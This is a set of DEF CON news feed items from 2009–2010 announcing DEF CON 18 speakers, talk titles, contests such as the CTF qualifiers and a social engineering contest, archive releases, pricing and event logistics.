DEF CON Forums!

==> DEF CON 18 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the Winners of the DEF CON 18 Artwork Contest! We had a bunch of great entries this year, But we could only pick a few! First Place and People's Choice vote win goes to "18 & Legal" by Mar! Second place goes to "DEF CON Boy" by oshu! Third Goes to "Her" by emtag! Congrats to all the winners and a big thanks to all who entered! To view and download all the wallpapers from this year's contest got to the DEF CON 18 Artwork Contest Public Gallery!

==> Artist pages are live!

https://www.defcon.org/defconrss.xml You can now view all the bios and samples from the killer line-up of artists performing at DEF CON this year! Check them out on the Entertainment page.

==> DEF CON 18 Speaking Schedule is Live!

https://www.defcon.org/defconrss.xml Do we need to say much more than that? Check out the DEF CON 18 Speaking Schedule.

==> The DC 18 Speaker List Is Still Growing!

https://www.defcon.org/defconrss.xml Here's another twenty-four hot-n-fresh new DEF CON talks. Feast. Katana: Portable Multi-Boot Security Suite JP Dunning Exploitable Assumptions Workshop Joe "Crazy" Foley, Eric "Unlocked" Schmiedl, Zoz The Law of Laptop Search and Seizure Jennifer Granick, Kevin Bankston, Marcia Hofmann, Kurt Opsahl Advanced Format String Attacks Paul Haas Tales from the Crypto G. Mark Hardy Decoding reCAPTCHA Chad Houck 0box Analyzer: AfterDark Runtime Forensics for Automated Malware Analysis and Clustering Wayne Huang, Jeremy Chiu Hardware Hacking for Software Guys Dave King These Aren't the Permissions You're Looking For Anthony Lineberry, Tim Wyatt, David Richardson, Sr. Multiplayer Metasploit: Tag-Team Penetration and Information Gathering Ryan Linn App Attack: Surviving the Mobile Application Explosion Kevin Mahaffey, John Hering Searching for Malware: A Review of Attackers Use of Search Engines to Lure Victims Dave Maynor, Dr. Paul Q. Judge Getting Social with the Smart Grid Justin Morehouse, Tony Flick Electronic Weaponry or How to Rule the World While Shopping at Radio Shack Timothy "Mage" Otto WiMAX Hacking 2010 Pierce, Goldy, aSmig Industrial Cyber Security Wade Polk, Paul Malkewicz, J.Novak Improving Antivirus Scanner Accuracy with Hypervisor Based Analysis Danny Quist Search & Seizure & Golfballs Jim Rennie, Eric Rachner pyREtic - In-memory Reverse Engineering for Obfuscated Python Bytecode Rich Smith Stratagem 1 - Deceiving the Heavens to Cross the Sea Jayson E. Street Breaking WPA-TKIP: Decrypting All Traffic Mathy Vanhoef Go Go Gadget Python! : Introduction to Hardware Hacking Nick Waite, Furkan Cayci The Night The Lights Went Out In Vegas: Demystifying Smartmeter Networks Barrett Weisshaar, Garret Picchioni Panels PCI, Compromising Controls and Compromising Security Jack Daniel, Joshua Corman, Dave Shackleford, Anton Chuvakin, Martin McKeay, Alex Hutton, James Arlen Meet the EFF Kurt Opsahl, Eva Galperin, Kevin Bankston, Jennifer Granick, Marcia Hofmann,

==> Voting is Officially Open for the DEF CON 18 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! Good Luck to all the fantastic entries!

==> That's Right.. We're Posting More DC 18 Speakers...

https://www.defcon.org/defconrss.xml Here's a new list of speaker adds You're probably not even finished absorbing the last one. That's just how we do. Deal with it. Mobile Privacy: Tor on the iPhone and Other Unusual Devices Marco Bonetti, sid77 Who Cares About IPv6? Sam Bowne masSEXploitation Michael Brooks Google Toolbar: The NARC Within Jeff Bryner WRT54-TM, Media Center and Network Sniffer John A. Colley IPv6: No Longer Optional John Curran Function Hooking for Mac OSX and Linux Joe Damato Breaking Bluetooth By Being Bored JP Dunning An Observatory for the SSLiverse Peter Eckersley, Jesse Burns How Unique Is Your Browser? Peter Eckersley Hacker Community (around) the Corporate World - Part II Luiz "effffn" Eduardo Be A Mentor! Marisa Fagen The Anatomy of Drug Testing Jimi Fiekert FOE The release of Feed Over Email, a Solution to Feed Controversial News to Censored Countries. Sho bleep Exploiting Digital Cameras Oren Isacson, Alfredo Ortega How I Met Your Girlfriend Samy Kamkar Bypassing Smart-card Authentication and Blocking Debiting: Vulnerabilities in Atmel Cryptomemory-based Stored-value Systems Jonathan Lee, Neil Pahl We Don't Need No Stinkin' Badges: Hacking Electronic Door Access Controllers Shawn Merdinger Letting the Air Out of Tire Pressure Monitoring Systems Mike Metzger Open Source Framework for Advanced Intrusion Detection Solutions Patrick Mullen, Ryan Pentney Antique Exploitation (aka Terminator 3: Point One One for Workgroups) Jon Oberheide Build Your Own Security Operations Center for Little or No Money Josh Pyorre Operating System Fingerprinting for Virtual Machines Nguyen Anh Quynh Lord of the Bing: Taking Back Search Engine Hacking from Google and Bing Rob Ragan. Francis Brown Social Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage The Suggmeister Getting Root: Remote Viewing, Non-local Consciousness, Big Picture Hacking, and Knowing Who You Are Richard Thieme INSECURITY ENGINEERING OF PHYSICAL SECURITY SYSTEMS: Locks, Lies, and Videotape Marc Weber Tobias, Tobias Bluzmanis, Matt Fiddler Build your own UAV 2.0 - Wireless Mayhem from the Heavens! Michael Weigand, Renderman, Mike Kershaw Crawling BitTorrent DHTs for Fun and Profit Scott Wolchok

==> More Speakers Added to the DEF CON website!

https://www.defcon.org/defconrss.xml DC 18 is getting close and we've added another batch of speakers. Keep tabs on the DEF CON 18 speakers page as we finalize the list. WPA Too! Md Sohail Ahmad Evilgrade, "You Still Have Pending Upgrades?" Francisco Amato Exploitation on ARM - Technique and Bypassing Defense Mechanism Itzhak "Zuk" Avraham Resilient Botnet Command and Control with Tor Dennis Brown Open Public Sensors and Trend Monitoring Daniel Burroughs Bad Memories Elie Burzstein, Baptiste Gourdin, Gustav Rydstedt Kartograph : Finding a Needle in a Haystack or How to Apply Reverse Engineering Techniques to Cheat at Video Games. Elie Burzstein, Jocelyn Lagarenne, Dan Boneh Token Kidnapping's Revenge Cesar Cerrudo Hacking Facebook Privacy Chris Conley Physical Security : You're Doing It Wrong! A.P. Delchi Hacking with Hardware: Introducing the Universal RF Usb Keboard Emulation Device - URFUKED Monta Elkins Trolling Reverse-Engineers with Math: Ness... It hurts... frank^2 Mastering the Nmap Scripting Engine Fyodor, David Fifield Live Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Making the DEFCON 18 Badge Joe "Kingpin" Grand Legal Developments in Hardware Hacking Jennifer Granick. Matt Zimmerman How To Get Your FBI File (and Other Information You Want From the Federal Government) Marcia Hoffman The Chinese Cyber Army - An Archaeological Study from 2001 to 201 Wayne Huang, Jack Yu Ripping Media Off Of the Wire HONEY Malware Migrating to Gaming Consoles: Embedded Devices, an AntiVirus-free Safe Hideout for Malware Ahn Ki-Chan, Ha Dong-Joo Training the Next Generation of Hardware Hackers -- Teaching Computer Organization and Assembly Language Hands-on with Embedded Systems Andrew Kongs, Dr. Gerald Kane ChaosVPN for playing CTFs mc.fly, vyrus, ryd FPGA Bitstream Reverse Engineering Lang Nguyen Kim Jong-il and Me: How to Build a Cyber Army to Defeat the U.S. Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer, Kevin Bankston Practical Cellphone Spying Chris Paget Extreme-range RFID Tracking Chris Paget My Life As A Spyware Developer Garry Pejski Implementing IPv6 at ARIN Matt Ryanczak Exploiting WebSphere Application Server's JSP Engine Ed Schaller Gaming in the Glass Safe - Games, DRM & Privacy Ferdinand Schober You're Stealing It Wrong! 30 Years of Inter-Pirate Battles Jason Scott Browser Based Defenses James Shewmaker Drivesploit: Circumventing Both Automated AND Manual Drive-by-Download Detection Caleb Sima, Wayne Huang Your ISP and the Government: Best Friends Forever. Christopher Soghoian Weaponizing Lady GaGa, Psychosonic Attacks Brad Smith From "No Way" to 0-day: Weaponizing the Unweaponizable Joshua Wise Pwned By The Owner: What Happens When You Steal A Hacker's Computer Zoz

==> DEF CON 18 Contest Madness!

https://www.defcon.org/defconrss.xml Over the past week or two, we've had a flood of announcements for new contests! Check them out below! Dark Tangent's Tamper Evident Contest There are various tamper evident technologies out there, including tape, seals, locks, tags, and bags, to name a few. This contest will test your ability to perform "defeats" (Described below) against a range of inexpensive commercial low to medium security products. Backdoor Hiding Contest Two in one Backdoor Hiding/Finding Contest (participate in either or both): In the first stage, hiding participants provide a source code hiding a backdoor, in the second stage organizers mix the source codes with non-backdoored (placebos), and then ask finding participants to spot the placebos. Hiding participants get hiding points for being voted as a placebo and finding participants get points for spotting the placebos and negative points for false positives. KoreLogic's "Crack Me If You Can" Contest As a part of an authorized penetration test of a large corporate network, you have captured a large number of passwords hashes. The hashes are from Active Directory, UNIX systems, LDAP servers, routers, etc. As part of your analysis, your client has asked for password complexity statistics, what their users are doing right and/or wrong related to generating passwords, and identification of weak passwords. You only have 48 hours to complete this effort.

==> CTF Quals Official Results!

https://www.defcon.org/defconrss.xml Congratulations to the qualifying teams for DEF CON Capture the Flag 2010! Official Quals info is live on ddtek.biz, so check it out for standings, correct and submitted answers by team and much more! Qualified teams: 1. VedaGodz (CONFIRMED!) 2. European Nopsled Team (CONFIRMED!) 3. TwoSixNine (CONFIRMED!) X. Uberminers (deadline expired) 4. lollersk8erz (CONFIRMED!) 5. GoN (CONFIRMED!) 6. painsec (CONFIRMED!) 7. ACME Pharm (CONFIRMED!) 8. Routards (CONFIRMED!) X. Nibbles (CAN'T PARTICIPATE) 9. shellphish (CONFIRMED!) 10. teambfe (CONFIRMED!) alt. Plaid Parliament of Pwning (CONFIRMED!) X. int3pid pandas (CAN'T PARTICIPATE) alt. HackerDom (CONFIRMED!)

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by Shawn Moyer entitled "Kill Yr Idols"!

==> CFP Closes, More Talks Posted!

https://www.defcon.org/defconrss.xml Here's another great batch of talks for DEF CON 18! Stay tuned, we got tons of last minute submissions, so there's a bunch more more coming down the pipe in the next couple of weeks! Internet Wars Panel More info to come. Cyber[Crime|War] Charting Dangerous Waters Iftach Ian Amit Seccubus - Analyzing Vulnerability Assessment Data the Easy Way... Frank Breedijk Exploiting SCADA Systems Jeremy Brown Katana: Portable Multi-Boot Security Suite JP Dunning Making the DEF CON 18 Badge. Joe "Kingpin" Grand How to Hack Millions of Routers Craig Heffner Powershell...omfg David Kennedy (ReL1K) and Josh Kelley (Winfang) Like a Boss: Attacking JBoss Tyler Krpata Blitzableiter - the Release Felix "FX" Lindner Changing Threats To Privacy: From TIA To Google Moxie Marlinspike Attacking .NET Programs at Runtime Jon McCoy Securing MMOs: A Security Professional's View From the Inside metr0 Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios Shawn Moyer and Nathan Keltner The Games We Play Brandon Nesbit ExploitSpotting: Locating Vulnerabilities Out of Vendor Patches Automatically Jeongwook Oh Sniper Forensics - One Shot, One Kill Christopher E. Pogue A.K.A "Big Poppa ReverShell" Toolsmithing an IDA Bridge, Case Study For Building a Reverse Engineering Tool Adam Pridgen A New Approach to Forensic Methodology - !!BUSTED!! Case Studies David C. Smith and Samuel Petreski Web Application Fingerprinting with Static Files Patrick Thomas VirGraff101: An Introduction to Virtual Graffiti Tottenkoph An Examination of the Adequacy of the Laws Related to Cyber Warfare Dondi "SpookDoctor06" West

==> Reg Open For Social Engineering Contest!

https://www.defcon.org/defconrss.xml The folks at social-engineer.org have taken the reigns of the DEF CON 18 Social Engineering Contest, and Registration is Open! This promises to be an exciting addition to this year's DEF CON, and has some pretty cool prizes, including an iPad and a spot on the Social Engineer Podcast for 1st place. Check out the contest description and official rules at http://www.social-engineer.org/blog/defcon-social-engineering-contest/.

==> DEF CON 18 CFP Closing Soon!

https://www.defcon.org/defconrss.xml Only a few more days to submit your CFP to speak at DEF CON 18! Call for Papers will officially close Tuesday June 1, so get those submissions in to share your cutting edge hacking research with the world! Check out the official announcement for details, and then fill out the Call for Papers Form.

==> New on defcon.org: CTF Archive and Speaker's Corner!

https://www.defcon.org/defconrss.xml We've got a couple of new sections on defcon.org, the first of which is the Capture The Flag Archive, a page dedicated to collecting accounts, walk throughs and other resources of Capture the Flag at DEF CON over the years, not only for history's sake but so the uninformed and/or interested can better grasp the epic journey that teams must face on the road to DEF CON CTF victory! We Just collected a bunch of the walkthroughs, video, and write-ups from this past weekend's CTF Quals so check it out! The second new section of defcon.org is called Speaker's Corner, where we will be posting short stories, talk teasers, technical info and words of wisdom from our DEF CON speakers past & present. The first post is by DEF CON 17 Speaker Jayson E. Street, and is entitled "Trying to Be a Wise Man at DEF CON", and thanks to Jayson for being the first to jump onboard! We hope you enjoy these new additions to the site and will help them to grow and be useful to all!

==> Minibosses at theSummit

https://www.defcon.org/defconrss.xml For immediate release: MiniBosses (http://www.minibosses.com/) have signed on as an official act to perform at theSummit on Thursday July 28th during DEF CON . They are the second act to confirm a performance spot at this years Fundraiser. At ShmooCon in February, DualCore announced that they will return again for this years event for the 4th consecutive year and 3rd year as the headlining act. Follow Us on Twitter for Event and Feature Guest Updates: www.twitter.com/effsummit Coming to event? Make your presences known on the Facebook Event Page: http://www.facebook.com/event.php?eid=112161832149640 About Mini Bosses: Four mid-20's guys from Phoenix got togeather for one common cause...Recreate the NES hits you all know and love in real-time on stage for everyones enjoyment pleasure. They consider all Bossies to be their groupies from the costs of Toyko to the midlands of Michigan. If your into 8-bit power cords, get ready to ride the midi wave of Awesome! About EFF: Blending the expertise of lawyers, policy analysts, activists, and technologists, EFF achieves significant victories on behalf of consumers and the general public. EFF fights for freedom primarily in the courts, bringing and defending lawsuits even when that means taking on the US government or large corporations. About Vegas 2.0: A transient, a local or a weekend Vegas Warrior, however you peg us, we are THE Las Vegas InfoSec group. Our members are long time DEF CON and Computer Security Industry avant guards. When we are not planning theSummit, we spend are free cycles conjuring up Social Engineering, Web and Windows attacks. We are always looking for new locals to Las Vegas OR frequent visitors to stop by our labs conveniently located in North Las Vegas for a beer and some InfoSec foo!

==> Contest & CFP Action Required!

https://www.defcon.org/defconrss.xml The vortex is swirling folks. There's sense of urgency in the air, you can't quite put your finger on it, but it's beginning to make you a little nervous and a little excited. Can you feel it nagging the back of your mind? That little voice saying, ever so quietly, "Less than 2 weeks left to submit a talk!", and "CTF Quals reg ends tomorrow!". Or maybe you hear, "write a short story", "Figure out LosT's puzzles" or "enter the Art Contest". That voice is actually us reminding you that all of these things are coming up or going on within the next two days to three weeks. So if you want to participate, you better get moving! Keep up on current events, as always, on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and here on defcon.org!

==> DEF CON 18 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml Its time again my creative friends, for another year of the DEF CON Artwork Contest! Get out your GIMP or Windows Movie maker and give a shot at making some awesome DEF CON Artwork! This year were putting the art contest back in the digital realm. There will be three types of entries, none of which are the standard shirt, sticker, poster designs of the past. This time around we want you to think about themes, desktop wallpapers and animation/motion graphics. You may draw inspiration from past DEF CON art or go in a whole new direction. Check out all the rules at: https://forum.defcon.org/showthread.php?t=11342

==> More DEF CON 18 Speakers!

https://www.defcon.org/defconrss.xml Here's another fresh batch of delicious Speaker goodness for you! Enjoy! Exploiting Internet Surveillance Systems Decius The Search for Perfect Handcuffs... and the Perfect Handcuff Key Deviant Ollam Jackpotting Automated Teller Machines Redux Barnaby Jack The Power of Chinese Security Anthony Lai, Jake Appelbaum and Jon Oberheide Repelling the Wily Insider Matias Madou and Jacob West You Spent All That Money And You Still Got Owned... Joseph McCray Cyberterrorism and the Security of the National Drinking Water Infrastructure John McNabb HD Voice - The Overdue Revolution Doug Mohney DEF CON Security Jam III: Now in 3-D? David Mortman, Rich Mogull, Chris Hoff, Rsnake, Dave Maynor, and Larry Pesce "This Needs To Be Fixed" and Other Jokes In Commit Statements Bruce Potter and Logan Lodge Airport Body Scanners and Possible Countermeasures Paul F. Renda Injecting Electromagnetic Pulses Into The Electric Grid Paul F. Renda SHODAN for Penetration Testers Michael "theprez98" Schearer SMART Project: Applying Reliability Metrics to Security Vulnerabilities Blake Self, Wayne Zage and Dolores Zage Hacking Oracle From Web Apps Sumit "sid" Siddharth So Many Ways to Slap A Yo-bleep:: Xploiting Yoville and Facebook for Fun and Profit strace Attack the Key, Own the Lock Schuyler Towne and datagram Balancing the Pwn Trade Deficit Valsmith, Owner, Colin Ames and Anthony Lai Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> DEF CON 18 Speakers Posted!

https://www.defcon.org/defconrss.xml Here we go! Here is the first of many batches of DEF CON 18 talks to be posted! Expect more early in the week! FOCA2: The FOCA strikes back Chema Alonso and José Palazón "Palako" Connection String Parameter Attacks Chema Alonso and José Palazón "Palako" SCADA and ICS for Security Experts: How to avoid cyberdouchery James Arlen Web Services We Just Don't Need Mike "mckt" Bailey Our Instrumented Lives: Sensors, Sensors, Everywhere... Greg Conti Cloud Computing, a weapon of mass destruction? David "VideoMan" M. N. Bryan The keys to running a successful DEF CON Group by DC612 David "VideoMan" M. N. Bryan and Jared Bird Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device Adrian Crenshaw Constricting the Web: Offensive Python for Web Hackers Nathan Hamiel and Marcin Wielgoszewski Hardware Black Magic: Designing Printed Circuit Boards Dr. Fouad Kiamilev, Corey 'c0re' Lange and Stephen 'afterburn' Janansky DCFluX in: Moon-bouncer Matt "DCFluX" Krick Air Traffic Control Insecurity 2.0 Righter Kunkel "This is not the droid you're looking for..." Nicholas J. Percoco and Christian Papathanasiou Malware Freak Show 2: The Client-Side Boogaloo Nicholas J. Percoco and Jibran Ilyas Build a Lie Detector/Beat a Lie Detector Rain and j03b34r Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> New DEF CON 18 Site!

https://www.defcon.org/defconrss.xml Check out the new site for DEF CON 18! It's got the most basic info for now, so keep your eyes peeled as all of the great talks, contests and events solidify! You can expect the first round of accepted speakers to be posted very soon! We're also working on a page to guide those new to DEF CON where to look for pertinent information. You will be able find all of the scheduling and entertainment info here as well as it becomes available, so be sure to follow us on the Twitter or Facebook feeds to stay up to the minute as we post new data! Wander around, get familiar, and be sure to check back for frequent updates to the madness that is DEF CON 18!

==> DEF CON 18 Updates

https://www.defcon.org/defconrss.xml Do your hear it? The whir of the gears of DEF CON planning reaching operating speed? All around us events are springing into action! HighWiz has stated intention to bring back DC101, a primer for those new to attending DEF CON. Not many details yet, but you can stay tuned to DC101 on the DEF CON Forums to stay up to date with details as they become available! We've also noticed that The Summit will be back this year, hosted by Vegas 2.0 to benefit the EFF! You can find details on the Summit Facebook page! We also can't fail to mention recent activity on LosT's Mystery Challenge. He says it's going to be the last year, so you better pay attention if you want to participate! You can follow the Mystery Challenge Forum and the Official Mystery Challenge Site at ten-five-seven.org. There is also a new forums based contest, called "What's in Neil's Pants", wherein Nikita asks a trivia question every week for the chance to win fabulous prizes from the things Neil leaves in his many pockets when he throws his pants in the hamper. You can also look for the DEF CON 18 Website to launch by the end of the month with an announcement for the DEF CON 18 Artwork Contest to be released in early May! As always, keep your eyes trained on the DEF CON Twitter for Updates as they occur!

==> New DEF CON 18 Short Story Contest!

https://www.defcon.org/defconrss.xml This contest is new this year and we are hoping it goes over well. Lots of you out there are avid writers and some just have an incredible imagination that when put to paper it blows your mind. Speaking from several years of reviewing white papers and slide decks, you guys are hilarious. We'd like to see your flair for creative writing put to another use and reward you for a (*cough*troll*Cough*) job well done. Good Luck! Check out all the details on the Short Story Contest Forum

==> EFF Proudly Presents the First Annual Defcon Getaway Fundraising Contest!

https://www.defcon.org/defconrss.xml From EFF.org: As the winter snows begin to melt, revealing a landscape full of promise and hope, a hackers thoughts turn to flights of fancy: specifically, the thought of being in Las Vegas during the last weekend in July. If youre one of those hackers and you love digital freedom, EFF would like your help spreading the word about our efforts to protect and defend coders rights by encouraging your friends and neighbors to join you in supporting us. In return, EFF wants to help the best EFFvangelists enjoy Defcon 18 in style! Read more...

==> DEF CON 18 Event/Contest Update!

https://www.defcon.org/defconrss.xml Contest and event planning is starting to heat up! A few more have surfaced and some others have begun conversation! Check out your favorite DEF CON Contest or Event link below for more info! 10,000¢ Hacker Pyramid: Call for Help Artwork Contest: Coming in May Badge Hacking Contest: Forum Active Be The Match Foundation - Bone Marrow Drive: NEW! Forum Active Beverage Cooling Contraption Contest: Forum Active Cannonball Run: Forum Active Capture the Flag: Quals Announced DEF CON Shoot: Forum Active Geo Challenge: Forum Active Social Engineering Contest: No Posts Goon Band — Recognize: Forum Active Forum Meet: Forum Active Hacker Jeopardy: Forum Active Hacker Karaoke: Forum Active Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: Forum Active Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active Open CTF: New Organizers, Forum Active QueerCon: No Posts Scavenger Hunt: Forum Active Spot the Fed:Forum Active Keep your eyes on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and defcon.org for updates!

==> DEF CON 18 CTF Quals Announced!

https://www.defcon.org/defconrss.xml From the DEF CON Forums: FOR IMMEDIATE RELEASE 1 APRIL 2010 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFON 18 CTF. Stock up on Red Bull, put the pizza delivery on speed dial, polish up your fancy shellcodes, and replenish the duct tape supply. The competition for these coveted spots will be held over 55 non-stop hours 21-24 May. When the dust clears only the 10 best will be invited to join us this summer in sin city for the annual DEFCON deathmatch. In historical fashion VedaGodz will be automatically be permitted contest entry. However, we wish to point out that real ninjas would still attempt to qualify. The qualification round will again be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking across a vast realm of security. This isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration, Level 3 are typically only answerable by sheep of above average barnyard intelligence, you get the idea. Pause your atari emulator and hop over the ddtek.biz to register. Only those that pre-register are permitted to play. Registration site: http://ddtek.biz/register.html Registration opens: 01 Apr 2010 00:00:00 UTC Registration ends: 20 May 2010 00:00:00 UTC Qualifications open: 21 May 2010 19:00:00 UTC Qualifications ends: 24 May 2010 02:00:00 UTC More information that will follow via your registered email address. Those with SANS certs need not apply. CISSPs are right out.* Vulc@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc.

==> DEF CON 18 Open CTF: DC949 Passes the Torch

https://www.defcon.org/defconrss.xml DC949, the creators of the Open CTF Contest (formerly Amateur CTF), after five long years have decided to step down as organizers. DEF CON would like to thank them for all of their hard work over the last five years in making a contest that was not only fun, but also open to all who'd like to test the waters of Capture the Flag type competition. They have passed the torch to a team that has competed in their contest many times, TubeWarriors. Welcome TubeWarriors, we wish you luck! You can read more in the Open CTF thread on the DEF CON Forums, as well as DC949's Farewell Thread.

==> DEFCON 18 Badge Call-for-Integration

https://www.defcon.org/defconrss.xml With the electronic DEFCON badge now in its fifth incarnation, we've decided to try something different. We're opening our kimono (just slightly) for DEFCON attendees, groups, villages, or contest organizers who want to integrate some piece of information or hide some piece of data in the badge to help further their cause during the con. For example, maybe your contest wants to hide a clue on the badge and then contestants have to find it in the code or press a certain button to reveal it... Read more on the DEF CON Forums. Submissions are due by April 1, 2010.

==> Be The Match Foundation - Bone Marrow Drive @ DEF CON 18

https://www.defcon.org/defconrss.xml As some of you may know, One of our speakers Thomas Wilhelm was recently a bone marrow donor from the Be the Match program. He contacted us about setting up a registry drive at Defcon 18. We like that Idea and are going to do what we can to make sure they have the space they need in order to grow their donor registry. You can Read More on the DEF CON Forums, and keep your eye on that forum for further details as they develop.

==> Want To Be A DJ or Band At DEF CON 18?

https://www.defcon.org/defconrss.xml The Artist Bookings for DEF CON 18 Bands and DJs are currently open! If you are a DJ or a Band that would like to play at the Black and White bleep, by the Pool, in the Chill Out area, or various other DEF CON events, now is the time to submit your application! DJ Great Scott will be accepting submissions up until May 3rd, 11:59pm (23:59) CST (US CENTRAL). You can find his post announcing this on the DEF CON Forums and fill out the application form. Good Luck!

==> Pics from DEF CON 17 on Facebook!

https://www.defcon.org/defconrss.xml Head on over to the Official DEF CON Facebook Fan Page and if you're not already, become a fan! We've uploaded pictures taken by the official DEF CON 17 photographer, ETA. Also some pics from Nikita, Dark Tangent, and other Goons who sent them to us. While you're there, start a discussion or leave us a comment, and Let us know where your DEF CON pics are!

==> Book your room for DEF CON 18!

https://www.defcon.org/defconrss.xml Get your room for DEF CON 18 booked early on the Riviera Reservation page for DEF CON 18! Rates are $99/night for the first two people! Additional fees may apply for more than 2 people per room.

==> DEF CON 18 Call for Papers is Open!

https://www.defcon.org/defconrss.xml More exciting than the latest 0-day in Acrobat or Internet Exploder, it's time for the DEF CON CFP to open! Check out the DEF CON 18 CFP Announcement for all the details!

==> Confirmed Contest and Events for DEF CON 18!

https://www.defcon.org/defconrss.xml The following Contests and Events have announced their intention to return for DEF CON 18! The ones that already have post activity are marked below. If you have an idea for a new contest or event, you can check out the New Ideas forum and see what kind of response you get! 10,000¢ Hacker Pyramid: No Posts Artwork Contest: No Posts Badge Hacking Contest: No Posts Beverage Cooling Contraption Contest: Forum Active Cannonball Run: No Posts Capture the Flag: No Posts DEF CON Shoot: Forum Active Geo Challenge: No Posts Social Engineering Contest: No Posts Hacker Jeopardy: Forum Active Hacker Karaoke: No Posts Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: No Posts Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active QueerCon: No Posts Scavenger Hunt: No Posts Spot the Fed:Forum Active We'll post updates as they happen on the DEF CON Twitter, DEF CON RSS Feed and here on the site!

==> DEF CON Archives Complete!

https://www.defcon.org/defconrss.xml DEF CON 9-11 music is now live, with RSS feeds for each. This completes the conversion of the DEF CON Archives for your enjoyment! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-9-music.rss https://www.defcon.org/podcast/defcon-10-music.rss https://www.defcon.org/podcast/defcon-11-music.rss

==> DEF CON 17 Merch at J!NX

https://www.defcon.org/defconrss.xml Was the swag line at the show too long for you? Just didn't get a chance to pick up a shirt? You can now find all of the remaining DEF CON 17 Merchandise at J!NX! There's even some shirts left over from DEF CON 16, Check it out!

==> DEF CON Archives Nearing Completion!

https://www.defcon.org/defconrss.xml DEF CON 10 and 11 presentation audio and video are now converted and live on their respective archives pages, and we have also posted RSS feeds for each. This makes the presentation archives complete! All that remains is to finish the DEF CON 9-11 Music RSS feeds, and the archives will be whole and up to date! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-10-audio.rss https://www.defcon.org/podcast/defcon-10-video.rss DEF CON 11 https://www.defcon.org/podcast/defcon-11-audio.rss https://www.defcon.org/podcast/defcon-11-video.rss Or check out the DEF CON Media Archives Page! Updates will be posted here on defcon.org, media.defcon.org, and the DEF CON Twitter, so keep watch!

==> Pricing for DEF CON 18

https://www.defcon.org/defconrss.xml As the CPU cycles of DEF CON 18 Planning begin to rise toward 100%, we wanted to inform you that the price of admission will be rising slightly for DEF CON 18 to $140 USD due to price increases in the cost of doing business in Las Vegas and Washington State. The economy is in a slump, but don't tell the tax crazy cities that! I can't afford that, you say? You could offset this modest bump in price if you were to save an extra 10 per day from now until con. That's what, one can of Jolt Cola per week? For almost four days of some of the most groundbreaking talks, contests, events and hacker social funtime around? Check the newspaper coin returns, look under your couch cushions, keep your eyes on the ground for change! You'll find that extra $20, and it'll be worth it! We are planning to make DEF CON bigger and better than previous years, with a new "No Drama Badge™" to keep you out of lines and in action. So keep watch on defcon.org and the DEF CON Twitter for news of the surprises we have in store!

==> Happy New Year from DEF CON!

https://www.defcon.org/defconrss.xml As 2009 fades away into the memory back ups, we'd like to wish you all happy hacking in 2010! At DEF CON World Domination HQ, we are wrapping up the last of the archiving and moving to get into DEF CON 18. We have some new surprises in development to make this year's show even better. So stay tuned to the DEF CON RSS Feed and the DEF CON Twitter for the latest updates as we release past content and announce new events and contests! We'll be opening the DC 18 Call for Papers some time in February, and now is a great time to start thinking about new ideas you may have for DEF CON 18. You can follow and participate in the Planning and New Ideas sections of the DEF CON Forums. Happy New year to all from the DEF CON Team!

==> DEF CON Archives Pages Up and Running!

https://www.defcon.org/defconrss.xml Gone are the days of the 10 mile deep DEF CON archives page! The new and improved archives pages for DEF CON 1-10 are now all up and running to match the 11-17 archives posted earlier this year. There is still a bit of audio left to transcode, and a few more RSS feeds coming, so keep your eyes on the archives and our twitter feed for those developments as they occur. You can also check out media.defcon.org for the list of of the most current updates to the media from past shows.

==> DEF CON HQ Update

https://www.defcon.org/defconrss.xml Hey Hackers, we just wanted to let you know what's going on here at DEF CON World Domination HQ! DT, Nikita and myself are grinding away at the DEF CON Archives working on the bestest New Year's gift ever, filling in the gaps and re-encoding all of the content from all of the past cons! We're also making audio and video RSS feeds for years that don't have them, and trying to pull some SEO magic to make everything ultimately more findable. SO, keep your eyes on the DEF CON Archives for all of the great stuff from the past 17 years that you forgot you wanted to know. If you don't already follow, the DEF CON Twitter feed is a great place to get the freshest announcements on what we are doing! By the way, the buzz for DEF CON 18 is already humming on the DEF CON Forums, and a few of the contests have planning threads and announcements open. Now is a great time to start thinking about new ideas that you might want to propose for this year's DEF CON, so post them there if you've got a great new idea!

==> Dark Tangent to Keynote Virtual Event

https://www.defcon.org/defconrss.xml Jeff Moss (Dark Tangent) to keynote Black Hat/Dark Reading virtual event December 9th. Visit https://www.blackhat.com/html/virtual2009/virtual2009-home.html for info.

==> Early Christmas! DEF CON 17 Video and Audio Now Online!

https://www.defcon.org/defconrss.xml That's right kids! Whether you've been naughty or nice, all of the audio and video from DEF CON 17 is now available for download! You can get it by heading to the DEF CON 17 Archive Page, and check out all of the awesome talks you want. You can also get them straight from the iTunes store or from the following RSS Feeds: * Speaker & Slides contains video of the speaker and their slides. * Slides contains video of the slides with speaker audio. * Audio for those you just want to listen to. We're also considering posting them soon for one massive download over torrent and peer to peer, so stay tuned, and enjoy!!

==> Re-encoded Past DEFCON Content!

